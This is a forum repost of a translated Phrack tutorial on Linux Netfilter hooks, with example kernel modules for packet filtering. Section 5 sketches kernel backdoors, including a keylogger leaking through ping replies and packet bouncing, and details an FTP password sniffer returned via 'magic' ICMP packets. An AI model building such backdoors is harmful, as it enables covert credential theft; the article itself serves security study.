免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 10168 | 回复: 15
打印 上一主题 下一主题

转:深入Linux网络核心堆栈! [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2004-02-20 13:40 |只看该作者 |倒序浏览
深入Linux网络核心堆栈

创建时间:2003-08-22
文章属性:翻译
文章提交:raodan (raod_at_30san.com)
出自:http://www.xfocus.net/articles/200308/599.html

==Phrack Inc.==

              卷标 0x0b, 期刊号 0x3d, Phile #0x0d of 0x0f

|=---------------------=[ 深入Linux网络核心堆栈 ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------=[ bioforge <alkerr@yifan.net>; ]=--------------------=|
|=------------------------=[ 翻译 : raodan ]=----------------------------=|

目录

1 - 简介
  1.1 - 本文涉及的内容
  1.2 - 本文不涉及的内容
2 - 各种Netfilter hook及其用法
  2.1 - Linux内核对数据包的处理
  2.2 - Netfilter对IPv4的hook
3 - 注册和注销Netfilter hook
4 - Netfilter 基本的数据报过滤技术[1]
  4.1 - 深入hook函数
  4.2 - 基于接口进行过滤
  4.3 - 基于地址进行过滤
  4.4 - 基于TCP端口进行过滤
5 - Netfilter hook的其它可能用法
  5.1 - 隐藏后门的守护进程
  5.2 - 基于内核的FTP密码嗅探器
    5.2.1 - 源代码 : nfsniff.c
    5.2.2 - 源代码 : getpass.c
6 - 在Libpcap中隐藏网络通信
  6.1 - SOCK_PACKET、SOCK_RAW与Libpcap
  6.2 - 给狼披上羊皮
7 - 结束语
A - 轻量级防火墙
  A.1 - 概述
  A.2 - 源代码 : lwfw.c
  A.3 - 头文件 : lwfw.h
B - 第6节中的源代码

--[ 1 - 简介

    本文将向你展示,Linux的网络堆栈的一些怪异行为(并不一定是弱点)如何被用于邪恶的或者是其它形形色色的目的。在这里将要讨论的是将表面上看起来合法的Netfilter hook用于后门的通信,以及一种使特定的网络通信在运行于本机的基于Libpcap的嗅探器中消声匿迹的技术。
    Netfilter是Linux 2.4内核的一个子系统,Netfiler使得诸如数据包过滤、网络地址转换(NAT)以及网络连接跟踪等技巧成为可能,这些功能仅通过使用内核网络代码提供的各式各样的hook既可以完成。这些hook位于内核代码中,要么是静态链接的,要么是以动态加载的模块的形式存在。可以为指定的网络事件注册相应的回调函数,数据包的接收就是这样一个例子。


----[ 1.1 - 本文涉及的内容
   
    本文讨论模块编写者如何利用Netfilter hook来实现任意目的以及如何将将网络通信在基于Libpcap的应用程序中隐藏。虽然Linux 2.4支持对IPv4、IPv6以及DECnet的hook,但在本文中将只讨论关于IPv4的话题,虽然如此,大部分关于IPv4的内容都同样可以运用于其它几种协议。出于教学的目的,附录A提供了一个可用的、提供基本的包过滤的内核模块。本文中所有的开发和试验都在运行于Intel主机上的Linux 2.4.5中完成。对Netfilter hook功能的测试在环回接口、以太网接口以及调制解调器点对点接口上完成。
   
    本文也是出于我对Netfilter完全理解的尝试的兴趣而写的。我并不能保证文中附带的任何代码100%的没有错误,但是我已经测试了所有在这里提供的代码。我已经受够了核心错误的折磨,因此真诚的希望你不会再如此。同样,我不会为任何按照本文所述进行的操作中可能发生的损害承担责任。本文假定读者熟悉C语言编程并且有一定的关于可加载模块的经验。
   
    欢迎对本文中出现的错误进行批评指正,我同时开诚布公的接受对本文的改进以及其它各种关于Netfilter的优秀技巧的建议。
   
   
---- [ 1.2 - 本文不涉及的内容

    本文不是一个完全的关于Netfilter的细节上的参考资料,同样,也不是一个关于iptables的命令的参考资料。如果你想了解更多的关于iptables的命令,请参考相关的手册页。
   
    好了,让我们从Netfilter的使用介绍开始 ...
   

--[ 2 - 各种Netfilter hook及其用法
----[ 2.1 - Linux内核对数据包的处理
   
    看起来好像是我很喜欢深入到诸如Linux的数据包处理以及事件的发生以及跟踪每一个Netfilter hook这样的血淋淋的细节中,事实并非如此!原因很简单,Harald Welte已经写了一篇关于这个话题的优秀的文章——《Journey  of a Packet Through the Linux 2.4 Network Stack》。如果你想了解更多的关于Linux数据包处理的内容,我强烈推荐你去拜读这篇文章。现在,仅需要理解:当数据包游历Linux内核的网络堆栈时,它穿过了几个hook点,在这里,数据包可以被分析并且选择是保留还是丢弃,这些hook点就是Netfilter hook。
   

----[ 2.2 - Netfilter对IPv4的hook

    Netfilter中定义了五个关于IPv4的hook,对这些符号的声明可以在linux/netfilter_ipv4.h中找到。这些hook列在下面的表中:
   
表1 : 可用的IPv4 hook

    Hook                调用的时机
NF_IP_PRE_ROUTING    在完整性校验之后,选路确定之前
NF_IP_LOCAL_IN        在选路确定之后,且数据包的目的是本地主机
NF_IP_FORWARD        目的地是其它主机地数据包
NF_IP_LOCAL_OUT        来自本机进程的数据包在其离开本地主机的过程中
NF_IP_POST_ROUTING    在数据包离开本地主机“上线”之前

    NF_IP_PRE_ROUTING这个hook是数据包被接收到之后调用的第一个hook,这个hook既是稍后将要描述的模块所用到的。当然,其它的hook同样非常有用,但是在这里,我们的焦点是在NF_IP_PRE_ROUTING这个hook上。

    在hook函数完成了对数据包所需的任何的操作之后,它们必须返回下列预定义的Netfilter返回值中的一个:
   
表2 : Netfilter返回值

    返回值                含义
NF_DROP                丢弃该数据包
NF_ACCEPT            保留该数据包
NF_STOLEN            忘掉该数据包
NF_QUEUE            将该数据包插入到用户空间
NF_REPEAT            再次调用该hook函数

    NF_DROP这个返回值的含义是该数据包将被完全的丢弃,所有为它分配的资源都应当被释放。NF_ACCEPT这个返回值告诉Netfilter:到目前为止,该数据包还是被接受的并且该数据包应当被递交到网络堆栈的下一个阶段。NF_STOLEN是一个有趣的返回值,因为它告诉Netfilter,“忘掉”这个数据包。这里告诉Netfilter的是:该hook函数将从此开始对数据包的处理,并且Netfilter应当放弃对该数据包做任何的处理。但是,这并不意味着该数据包的资源已经被释放。这个数据包以及它独自的sk_buff数据结构仍然有效,只是hook函数从Netfilter获取了该数据包的所有权。不幸的是,我还不是完全的清楚NF_QUEUE到底是如果工作的,因此在这里我不讨论它。最后一个返回值NF_REPEAT请求Netfilter再次调用这个hook函数。显然,使用者应当谨慎使用NF_REPEAT这个返回值,以免造成死循环。
   
--[3 - 注册和注销Netfilter hook

    注册一个hook函数是围绕nf_hook_ops数据结构的一个非常简单的操作,nf_hook_ops数据结构在linux/netfilter.h中定义,该数据结构的定义如下:

  1.           struct nf_hook_ops {
  2.                   struct list_head list;

  3.                   /* 此下的值由用户填充 */
  4.                   nf_hookfn *hook;
  5.                   int pf;
  6.                   int hooknum;
  7.                   /* Hook以升序的优先级排序 */
  8.                   int priority;
  9.           };
复制代码

    该数据结构中的list成员用于维护Netfilter hook的列表,并且不是用户在注册hook时需要关心的重点。hook成员是一个指向nf_hookfn类型的函数的指针,该函数是这个hook被调用时执行的函数。nf_hookfn同样在linux/netfilter.h中定义。pf这个成员用于指定协议族。有效的协议族在linux/socket.h中列出,但对于IPv4我们希望使用协议族PF_INET。hooknum这个成员用于指定安装的这个函数对应的具体的hook类型,其值为表1中列出的值之一。最后,priority这个成员用于指定在执行的顺序中,这个hook函数应当在被放在什么地方。对于IPv4,可用的值在linux/netfilter_ipv4.h的nf_ip_hook_priorities枚举中定义。出于示范的目的,在后面的模块中我们将使用NF_IP_PRI_FIRST。
   
    注册一个Netfilter hook需要调用nf_register_hook()函数,以及用到一个nf_hook_ops数据结构。nf_register_hook()函数以一个nf_hook_ops数据结构的地址作为参数并且返回一个整型的值。但是,如果你真正的看了在net/core/netfilter.c中的nf_register_hook()函数的实现代码,你会发现该函数总是返回0。以下提供的是一个示例代码,该示例代码简单的注册了一个丢弃所有到达的数据包的函数。该代码同时展示了Netfilter的返回值如何被解析。

    示例代码1 : Netfilter hook的注册
  1. /*
  2. * 安装一个丢弃所有到达的数据包的Netfilter hook函数的示例代码
  3. */

  4. #define __KERNEL__
  5. #define MODULE

  6. #include <linux/module.h>;
  7. #include <linux/kernel.h>;
  8. #include <linux/netfilter.h>;
  9. #include <linux/netfilter_ipv4.h>;

  10. /* 用于注册我们的函数的数据结构 */
  11. static struct nf_hook_ops nfho;

  12. /* 注册的hook函数的实现 */
  13. unsigned int hook_func(unsigned int hooknum,
  14.                        struct sk_buff **skb,
  15.                        const struct net_device *in,
  16.                        const struct net_device *out,
  17.                        int (*okfn)(struct sk_buff *))
  18. {
  19.     return NF_DROP;           /* 丢弃所有的数据包 */
  20. }

  21. /* 初始化程序 */
  22. int init_module()
  23. {
  24.     /* 填充我们的hook数据结构 */
  25.     nfho.hook = hook_func;         /* 处理函数 */
  26.     nfho.hooknum  = NF_IP_PRE_ROUTING; /* 使用IPv4的第一个hook */
  27.     nfho.pf       = PF_INET;
  28.     nfho.priority = NF_IP_PRI_FIRST;   /* 让我们的函数首先执行 */

  29.     nf_register_hook(&nfho);

  30.     return 0;
  31. }

  32. /* 清除程序 */
  33. void cleanup_module()
  34. {
  35.     nf_unregister_hook(&nfho);
  36. }
复制代码
   这就是全部内容,从示例代码1中,你可以看到,注销一个Netfilter hook是一件很简单事情,只需要调用nf_unregister_hook()函数,并且以你之前用于注册这个hook时用到的相同的数据结构的地址作为参数。
   

-- [4 - Netfilter 基本的数据报过滤技术
---- [4.1 - 深入hook函数

    现在是到了看看什么数据被传递到hook函数中以及这些数据如何被用于做过滤选择的时候了。那么,让我们更深入的看看nf_hookfn函数的原型吧。这个函数原型在linux/netfilter.h中给出,如下:

  1.           typedef unsigned int nf_hookfn(unsigned int hooknum,
  2.                                          struct sk_buff **skb,
  3.                                          const struct net_device *in,
  4.                                          const struct net_device *out,
  5.                                          int (*okfn)(struct sk_buff *));

  6.    
复制代码
nf_hookfn函数的第一个参数用于指定表1中给出的hook类型中的一个。第二个参数更加有趣,它是一个指向指针的指针,该指针指向的指针指向一个sk_buff数据结构,网络堆栈用sk_buff数据结构来描述数据包。这个数据结构在linux/skbuff.h中定义,由于它的内容太多,在这里我将仅列出其中有意义的部分。

    sk_buff数据结构中最有用的部分可能就是那三个描述传输层包头(例如:UDP, TCP, ICMP, SPX)、网络层包头(例如:IPv4/6, IPX, RAW)以及链路层包头(例如:以太网或者RAW)的联合(union)了。这三个联合的名字分别是h、nh以及mac。这些联合包含了几个结构,依赖于具体的数据包中使用的协议。使用者应当注意:传输层包头和网络层包头可能是指向内存中的同一个位置。这是TCP数据包可能出现的情况,其中h和nh都应当被看作是指向IP头结构的指针。这意味着尝试通过h->;th获取一个值,并认为该指针指向一个TCP头,将会得到错误的结果。因为h->;th实际上是指向的IP头,与nh->;iph得到的结果相同。

    接下来让我们感兴趣的其它部分是len和data这两个域。len指定了从data开始的数据包中的数据的总长度。好了,现在我们知道如何在sk_buff数据结构中分别访问协议头和数据包中的数据了。Netfilter hook函数中有用的信息中其它的有趣的部分是什么呢?

    紧跟在skb之后的两个参数是指向net_device数据结构的指针,net_device数据结构被Linux内核用于描述所有类型的网络接口。这两个参数中的第一个——in,用于描述数据包到达的接口,毫无疑问,参数out用于描述数据包离开的接口。必须明白,在通常情况下,这两个参数中将只有一个被提供。例如:参数in只用于NF_IP_PRE_ROUTING和NF_IP_LOCAL_IN hook,参数out只用于NF_IP_LOCAL_OUT和NF_IP_POST_ROUTING hook。在这一个阶段中,我还没有测试对于NF_IP_FORWARD hook,这两个参数中哪些是有效的,但是如果你能在使用之前先确定这些指针是非空的,那么你是非常优秀的!

    最后,传递给hook函数的最后一个参数是一个命名为okfn函数指针,该函数以一个sk_buff数据结构作为它唯一的参数,并且返回一个整型的值。我不是很确定这个函数是干什么用的,在net/core/netfilter.c中查看,有两个地方调用了这个okfn函数。这两个地方是分别在函数nf_hook_slow()中以及函数nf_reinject()中,在其中的某个位置,当Netfilter hook的返回值为NF_ACCEPT时被调用。如果任何人有更多的关于okfn函数的信息,请务必告知。
   
    ** 译注:Linux核心网络堆栈中有一个全局变量 : struct list_head nf_hooks[NPROTO][NF_MAX_HOOKS],该变量是一个二维数组,其中第一维用于指定协议族,第二维用于指定hook的类型(表1中定义的类型)。注册一个Netfilter hook实际就是在由协议族和hook类型确定的链表中添加一个新的节点。
     
    以下代码摘自 net/core/netfilter,nf_register_hook()函数的实现:
  1. int nf_register_hook(struct nf_hook_ops *reg)
  2. {
  3.     struct list_head *i;

  4.     br_write_lock_bh(BR_NETPROTO_LOCK);
  5.     for (i = nf_hooks[reg->;pf][reg->;hooknum].next;
  6.          i != &nf_hooks[reg->;pf][reg->;hooknum];
  7.          i = i->;next) {
  8.         if (reg->;priority < ((struct nf_hook_ops *)i)->;priority)
  9.             break;
  10.     }
  11.     list_add(&->;list, i->;prev);
  12.     br_write_unlock_bh(BR_NETPROTO_LOCK);
  13.     return 0;
  14. }
复制代码

    Netfilter中定义了一个宏NF_HOOK,作者在前面提到的nf_hook_slow()函数实际上就是NF_HOOK宏定义替换的对象,在NF_HOOK中执行注册的hook函数。NF_HOOK在Linux核心网络堆栈的适当的地方以适当的参数调用。例如,在ip_rcv()函数(位于net/ipv4/ip_input.c)的最后部分,调用NF_HOOK函数,执行NF_IP_PRE_ROUTING类型的hook。ip_rcv()是Linux核心网络堆栈中用于接收IPv4数据包的主要函数。在NF_HOOK的参数中,页包含一个okfn函数指针,该函数是用于数据包被接收后完成后续的操作,例如在ip_rcv中调用的NF_HOOK中的okfn函数指针指向ip_rcv_finish()函数(位于net/ipv4/ip_input.c),该函数用于IP数据包被接收后的诸如IP选项处理等后续处理。
   
    如果在内核编译参数中取消CONFIG_NETFILTER宏定义,NF_HOOK宏定义直接被替换为okfn,内核代码中的相关部分如下(linux/netfilter.h):

  1. #ifdef CONFIG_NETFILTER
  2. ...
  3. #ifdef CONFIG_NETFILTER_DEBUG
  4. #define NF_HOOK nf_hook_slow
  5. #else
  6. #define NF_HOOK(pf, hook, skb, indev, outdev, okfn)            \
  7. (list_empty(&nf_hooks[(pf)][(hook)])                    \
  8. ? (okfn)(skb)                                \
  9. : nf_hook_slow((pf), (hook), (skb), (indev), (outdev), (okfn)))
  10. #endif
  11. ...
  12. #else /* !CONFIG_NETFILTER */
  13. #define NF_HOOK(pf, hook, skb, indev, outdev, okfn) (okfn)(skb)
  14. #endif /*CONFIG_NETFILTER*/
  15.    
复制代码

    可见okfn函数是必不可少的,当Netfilter被启用时,它用于完成接收的数据包后的后续操作,如果不启用Netfilter做数据包过滤,则所有的数据包都被接受,直接调用该函数做后续操作。
   
    ** 译注完
   
    现在,我们已经了解了我们的hook函数接收到的信息中最有趣和最有用的部分,是该看看我们如何以各种各样的方式来利用这些信息来过滤数据包的时候了!
   
   
----[4.2 - 基于接口进行过滤

    这应该是我们能做的最简单的过滤技术了。还记得我们的hook函数接收的参数中的那些net_device数据结构吗?使用相应的net_device数据结构的name这个成员,你就可以根据数据包的源接口和目的接口来选择是否丢弃它。如果想丢弃所有到达接口eth0的数据包,所有你需要做的仅仅是将in->;name的值与"eth0"做比较,如果名字匹配,那么hook函数简单的返回NF_DROP即可,数据包会被自动销毁。就是这么简单!完成该功能的示例代码见如下的示例代码2。注意,Light-Weight FireWall模块将会提供所有的本文提到的过滤方法的简单示例。它还包含了一个IOCTL接口以及用于动态改变其特性的应用程序。
   
    示例代码2 : 基于源接口的数据包过滤
  1. /*
  2. * 安装一个丢弃所有进入我们指定接口的数据包的Netfilter hook函数的示例代码
  3. */

  4. #define __KERNEL__
  5. #define MODULE
  6. #include <linux/module.h>;
  7. #include <linux/kernel.h>;
  8. #include <linux/netdevice.h>;
  9. #include <linux/netfilter.h>;
  10. #include <linux/netfilter_ipv4.h>;
  11. /* 用于注册我们的函数的数据结构 */
  12. static struct nf_hook_ops nfho;

  13. /* 我们丢弃的数据包来自的接口的名字 */
  14. static char *drop_if = "lo";

  15. /* 注册的hook函数的实现 */
  16. unsigned int hook_func(unsigned int hooknum,
  17.                        struct sk_buff **skb,
  18.                        const struct net_device *in,
  19.                        const struct net_device *out,
  20.                        int (*okfn)(struct sk_buff *))
  21. {
  22.     if (strcmp(in->;name, drop_if) == 0) {
  23.         printk("Dropped packet on %s...\n", drop_if);
  24.         return NF_DROP;
  25.     } else {
  26.         return NF_ACCEPT;
  27.     }
  28. }

  29. /* 初始化程序 */
  30. int init_module()
  31. {
  32.     /* 填充我们的hook数据结构 */
  33.     nfho.hook     = hook_func;         /* 处理函数 */
  34.     nfho.hooknum  = NF_IP_PRE_ROUTING; /* 使用IPv4的第一个hook */
  35.     nfho.pf       = PF_INET;
  36.     nfho.priority = NF_IP_PRI_FIRST;   /* 让我们的函数首先执行 */

  37.     nf_register_hook(&nfho);
  38.    
  39.     return 0;
  40. }
  41.    
  42. /* 清除程序 */
  43. void cleanup_module()
  44. {
  45.     nf_unregister_hook(&nfho);
  46. }
复制代码

    是不是很简单?接下来,让我们看看基于IP地址的过滤。
   

----[ 4.3 - 基于地址进行过滤

    与根据数据包的接口进行过滤类似,基于数据包的源或目的IP地址进行过滤同样简单。这次我们感兴趣的是sk_buff数据结构。还记得skb参数是一个指向sk_buff数据结构的指针的指针吗?为了避免犯错误,声明一个另外的指向skb_buff数据结构的指针并且将skb指针指向的指针赋值给这个新的指针是一个好习惯,就像这样:
   

  1.       struct sk_buff *sb = *skb;    /* Remove 1 level of indirection* /
复制代码


    这样,你访问这个数据结构的元素时只需要反引用一次就可以了。获取一个数据包的IP头通过使用sk_buff数据结构中的网络层包头来完成。这个头位于一个联合中,可以通过sk_buff->;nh.iph这样的方式来访问。示例代码3中的函数演示了当得到一个数据包的sk_buff数据结构时,如何利用它来检查收到的数据包的源IP地址与被禁止的地址是否相同。这些代码是直接从LWFW中取出来的,唯一不同的是LWFW统计的更新被移除。
   
    示例代码3 : 检查收到的数据包的源IP
   

  1.       unsigned char *deny_ip = "\x7f\x00\x00\x01";  /* 127.0.0.1 */
  2.       
  3.       ...

  4.           static int check_ip_packet(struct sk_buff *skb)
  5.           {
  6.               /* We don't want any NULL pointers in the chain to
  7.                * the IP header. */
  8.               if (!skb )return NF_ACCEPT;
  9.               if (!(skb->;nh.iph)) return NF_ACCEPT;
  10.          
  11.               if (skb->;nh.iph->;saddr == *(unsigned int *)deny_ip) {
  12.               return NF_DROP;
  13.               }

  14.               return NF_ACCEPT;
  15.           }
复制代码
   
    这样,如果数据包的源地址与我们设定的丢弃数据包的地址匹配,那么该数据包将被丢弃。为了使这个函数能按预期的方式工作,deny_ip的值应当以网络字节序(Big-endian,与Intel相反)存放。虽然这个函数不太可能以一个空的指针作为参数来调用,带一点点偏执狂从来不会有什么坏处。当然,如果错误确实发生了,那么该函数将会返回NF_ACCEPT。这样Netfilter可以继续处理这个数据包。示例代码4展现了用于演示将基于接口的过滤略做修改以丢弃匹配给定IP地址的数据包的简单模块。
   
   示例代码4 : 基于数据包源地址的过滤

  1. /* 安装丢弃所有来自指定IP地址的数据包的Netfilter hook的示例代码 */

  2. #define __KERNEL__
  3. #define MODULE

  4. #include <linux/module.h>;
  5. #include <linux/kernel.h>;
  6. #include <linux/skbuff.h>;
  7. #include <linux/ip.h>;                  /* For IP header */
  8. #include <linux/netfilter.h>;
  9. #include <linux/netfilter_ipv4.h>;

  10. /* 用于注册我们的函数的数据结构 */
  11. static struct nf_hook_ops nfho;

  12. /* 我们要丢弃的数据包来自的地址,网络字节序 */
  13. static unsigned char *drop_ip = "\x7f\x00\x00\x01";

  14. /* 注册的hook函数的实现 */
  15. unsigned int hook_func(unsigned int hooknum,
  16.                        struct sk_buff **skb,
  17.                        const struct net_device *in,
  18.                        const struct net_device *out,
  19.                        int (*okfn)(struct sk_buff *))
  20. {
  21.     struct sk_buff *sb = *skb;
  22.    
  23.     // 译注:作者提供的代码中比较地址是否相同的方法是错误的,见注释掉的部分
  24.     if (sb->;nh.iph->;saddr == *(unsigned int *)drop_ip) {
  25.     // if (sb->;nh.iph->;saddr == drop_ip) {
  26.         printk("Dropped packet from... %d.%d.%d.%d\n",
  27.       *drop_ip, *(drop_ip + 1),
  28.   *(drop_ip + 2), *(drop_ip + 3));
  29.         return NF_DROP;
  30.     } else {
  31.         return NF_ACCEPT;
  32.     }
  33. }

  34. /* 初始化程序 */
  35. int init_module()
  36. {
  37.     /* 填充我们的hook数据结构 */
  38.     nfho.hook       = hook_func;         /* 处理函数 */
  39.     nfho.hooknum  = NF_IP_PRE_ROUTING; /* 使用IPv4的第一个hook */
  40.     nfho.pf       = PF_INET;
  41.     nfho.priority = NF_IP_PRI_FIRST;   /* 让我们的函数首先执行 */

  42.     nf_register_hook(&nfho);

  43.     return 0;
  44. }

  45. /* 清除程序 */
  46. void cleanup_module()
  47. {
  48.     nf_unregister_hook(&nfho);
  49. }
复制代码

----[ 4.4 - 基于TCP端口进行过滤

    另一个要实现的简单规则是基于数据包的TCP目的端口进行过滤。这只比检查IP地址的要求要高一点点,因为我们需要自己创建一个TCP头的指针。还记得我们前面讨论的关于传输层包头与网络层包头的内容吗?获取一个TCP头的指针是一件简单的事情——分配一个tcphdr数据结构(在linux/tcp.h中定义)的指针,并将它指向我们的数据包中IP头之后的数据。或许一个例子的帮助会更大一些,示例代码5给出了检查数据包的TCP目的端口是否与某个我们要丢弃数据包的端口匹配的代码。与示例代码3一样,这些代码摘自LWFW。
   
    示例代码5 : 检查收到的数据包的TCP目的端口

  1.           unsigned char *deny_port = "\x00\x19";   /* port 25 */

  2.       ...

  3.           static int check_tcp_packet(struct sk_buff *skb)
  4.           {
  5.               struct tcphdr *thead;

  6.               /* We don't want any NULL pointers in the chain
  7.                * to the IP header. */
  8.               if (!skb ) return NF_ACCEPT;
  9.               if (!(skb->;nh.iph)) return NF_ACCEPT;

  10.               /* Be sure this is a TCP packet first */
  11.               if (skb->;nh.iph->;protocol != IPPROTO_TCP) {
  12.                   return NF_ACCEPT;
  13.               }

  14.               thead = (struct tcphdr *)(skb->;data +
  15.                                        (skb->;nh.iph->;ihl * 4));

  16.               /* Now check the destination port */
  17.               if ((thead->;dest) == *(unsigned short *)deny_port) {
  18.                   return NF_DROP;
  19.               }
  20.          
  21.           return NF_ACCEPT;
  22.           }
复制代码

    确实很简单!不要忘了,要让这个函数工作,deny_port必须是网络字节序。这就是数据包过滤的基础了,你应当已经清楚的理解了对于一个特定的数据包,如何获取你想要的信息。现在,是该进入更有趣的内容的时候了!
   

--[ 5 - Netfilter hook的其它可能用法

    在这里,我将提出其它很酷的利用Netfilter hook的点子,5.1节将简单的给出精神食粮,而5.2节将讨论和给出可以工作的基于内核的FTP密码嗅探器的代码,它的远程密码获取功能是确实可用的。事实上,它工作的令我吃惊的好,并且我编写了它。
   
----[ 5.1 - 隐藏后门的守护进程

    核心模块编程也许是Linux开发中最有趣的部分之一了,在内核中编写代码意味着你在一个仅受限于你的想象力的地方写代码。以恶意的观点来看,你可以隐藏文件、进程,并且做各式各样很酷的,任何的rootkit能够做的事情。那么,以不太恶意的观点来看(是的,持这中观点人们的确存在),你可以隐藏文件、进程以及干各式各样的事情。内核真是一个迷人的乐园!
   
    有了赋予内核级程序员的强大力量,很多事情成为可能。其中最有趣的(也是让系统管理员恐慌的)一个就是嵌入到内核中的后门。毕竟,如果后门不作为一个进程运行,那么我们怎么知道它的运行?当然,还是有办法让你的内核揪出这样的后门来,但是它们可不像运行ps命令一样容易和简单。现今,将后门代码放到内核中去的点子已经并不新鲜了。但是,我在这里所提出的是安放一个用作内核后门的简单的网络服务。你猜对了,正是Netfilter hook!
   
    如果你已经具备必要的技能并且情愿以做试验的名义使你的内核崩溃,那么你就可以构建简单但是有用的,完全位于内核中的,可以远程访问的网络服务了。基本上一个Netfilter hook可以通过观察收到的数据包来查找一个“魔法”数据包,并且当接收到这个“魔法”数据包时干指定的事情。结果可以通过Netfilter hook来发送。并且该hook函数可以返回NF_STOLEN,以使得收到的“魔法”数据包可以走得更远。但是要注意,当以这种方式来发送时,输出数据包对于输出Netfilter hook仍然是可见的。因此用户空间完全不知道这个“魔法”数据包的曾经到达,但是它们还是能看到你送所出的。当心!因为在泄密主机上的嗅探器不能看到这个包并不意味着在其它中间宿主主机上的嗅探器也看不到这个包。
   
    kossak与lifeline曾为Phrack写了一篇精彩的文章,该文描述了如何通过注册数据包类型处理器来完成这样的功能。虽然本文涉及的是Netfilter hook,我仍然建议阅读他们的这篇文章(第55期,文件12),因为它是一篇给出了一些非常有趣的点子的有趣读物。
   
    那么,后门Netfilter hook可以干些什么工作呢?以下是一些建议:
    -- 远程访问击键记录器(key-logger)。模块记录击键,并且当远程主机发送一个PING请求时,结果被送到该主机。这样,可以生成一个类似于稳定的(非洪水的)PING应答流的击键信息的流。当然,你可能想要实现一个简单的加密,这样,ASCII键不会立即暴露它们自己,并且某些警觉的系统管理员会想:“坚持,我以前都是通过我的SSH会话来键入那些的!Oh $%@T%&!”。
    -- 各种简单的管理员任务,例如获取当前登录到主机的用户的列表或责获取打开的网络连接的信息。
    -- 并非一个真正的后门,而是位于网络边界的模块,并且阻挡任何被疑为来自特洛伊木马、ICMP隐蔽通道或者像KaZaa这样的文件共享工具的通信。
    -- 文件传输“服务器”。我最近已经实现了这个主意,由此引起的Linux核心编程是数小时的乐趣
    -- 数据包跳跃。重定向目的为木马主机指定端口的数据包到其它的IP主机和端口,并且从那台主机发回数据包到发起者。没有进程被派生,并且最妙的是,没有网络套接字被打开。
    -- 上面描述的数据包跳跃用于与网络中的关键系统以半隐蔽方式通信。例如:配置路由器等。
    -- FTP/POP3/Telnet密码嗅探器。嗅探输出的密码并保存相关信息,直到进入的“魔法”数据包要求获取它们。
   
    以上只是一些想法的简短的列表,其中最后一个想法是我们在接下来的一节中将要真正详细讨论的。它
提供了一个很好的了解更多的深藏于核心网络代码中的函数的机会。

----[ 5.2 - 基于内核的FTP密码嗅探器

    在这里展现的是一个简单的,原理性的,用做Netfilter后门的模块。该模块嗅探输出的FTP数据包,查找对于一个FTP服务器一个USER于PASS命令对。当这样一个命令对被发现后,该模块接下来将等待一个“魔法”ICMP ECHO(ping)数据包,该数据包应当足够大,使其能返回服务器的IP地址、用户名以及密码。同时提供了一个快速的发送一个“魔法”数据包,获取返回然后打印返回信息的技巧。一旦用户名/密码对从模块读取后,模块将接着查找下一对。注意,模块每次只保存一个对。以上是简要的浏览,是该展示更多的细节,来看模块如何做到这些的时候了。
   
    当模块加载时,模块的init_module()函数简单的注册了两个Netfilter hook。第一个用于查看输入的数据包(在NF_IP_PRE_ROUTING处),尝试发现“魔法”ICMP数据包。接下来的一个用于查看离开该模块被安装的主机的数据包(在NF_IP_POST_ROUTING处),这个函数正是搜索和捕获FTP的USER和PASS数据包的地方。cleanup_module()函数只是简单的注销这两个hook。
   
    watch_out()是用于hook NF_IP_POST_ROUTING的函数,查看这个函数你可以看到,它的执行的操作非常简单。当一个数据包进入这个函数过后,将经过各种检查,以确定它是一个FTP数据包。如果它不是一个FTP数据包,那么立即返回NF_ACCEPT。如果它是一个FTP数据包,那么该模块进行检查是否已经存在一个用户名/密码对。如果存在(以have_pair的非零值标识),那么返回NF_ACCEPT,该数据包最终能够离开该系统。否则,check_ftp()函数被调用,这是密码提取实际发生的地方。如果没有先前的数据包已经被接收,那么target_ip和target_port变量应当被清除。
   
    check_ftp()开始于从数据包的开始查找"USER","ASS"或"QUIT"。注意直到USER命令处理之后才处理PASS命令。这样做的目的是为了防止在某些情况下PASS命令先于USER命令被接收到以及在USER到达之前连接中断而导致的死锁的发生。同样,如果QUIT命令到达时仅有用户名被捕获,那么将重置操作,开始嗅探一个新的连接。当一个USER或者PASS命令到达时,如果必要完整性校验通过,则记录下命令的参数。正常运行下,在check_ftp()函数完成之前,检查是否已经有了一个有效的用户名和密码串。如果是,则设置have_pair的值为非零并且在当前的用户名/密码对被获取之前不会再抓取其它的用户名或密码。
   
    到目前为止你已经看到了该模块如何安装它自己以及如何开始搜寻待记录的用户名和密码。接下来你将看到当指定的“魔法”数据包到达时会发生什么。在此需特别注意,因为这是在整个开发过程中出现的最大难题。如果我没记错的话,共遭遇了16个核心错误。当数据包进安装该模块的主机时,watch_in()检查每一个数据包以查看其是否是一个“魔法”数据包。如果数据包不能提供足以证明它是一个“魔法”数据包的信息,那么它将被被watch_in()忽略,简单的返回一个NF_ACCEPT。注意“魔法”数据包的标准之一是它们必须有足够的空间来存放IP地址以及用户名和密码串。这使得发送应答更加容易。当然,可以重新分配一个新的sk_buff,但是正确的获取所有必要的域得值可能会比较困难,并且你还必须得正确的获取它们!因此,与其为我们的应答数据包创建一个新的数据结构,不如简单的调整请求数据包的数据结构。为了成功的返回数据包,需要做几个改动。首先,交换IP地址,并且sk_buff数据结构中描述数据包类型的域(pkt_type)应当被换成PACKET_OUTGOING,这些宏在linux/if_packet.h中定义。接下来应当小心的是确定包含了任意的链路层头。我们接收到的数据包的sk_buff数据结构的数据域指向链路层头之后,并且它是指向被发送的数据包的数据的开始的数据域。那么对于需要链路层包头(以太网及环回和点对点的raw)的接口,我们将数据域指向mac.ethernet或者mac.raw结构。为确定这个数据包来自的什么类型的接口你可以查看sb->;dev->;type的值,其中sb是一个指向sk_buff数据结构的指针。这个域的有效值可以在linux/if_arp.h中找到,但其中最有用的几个在下面的表3中列出。
   
表3 : 接口类型的常用值

类型代码        接口类型
ARPHRD_ETHER    以太网
ARPHRD_LOOPBACK    环回设备
ARPHRD_PPP        点对点(例如拨号)

